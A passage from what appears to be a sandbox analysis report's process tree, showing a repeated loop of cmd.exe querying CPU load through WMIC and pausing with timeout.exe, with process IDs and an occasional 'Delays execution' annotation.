    wmic cpu get loadpercentage
    3⤵
    PID:2180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2560
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1800
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4964
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1800
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2168
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:68
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4596
- - C:\Windows\System32\Wbem\WMIC.exe
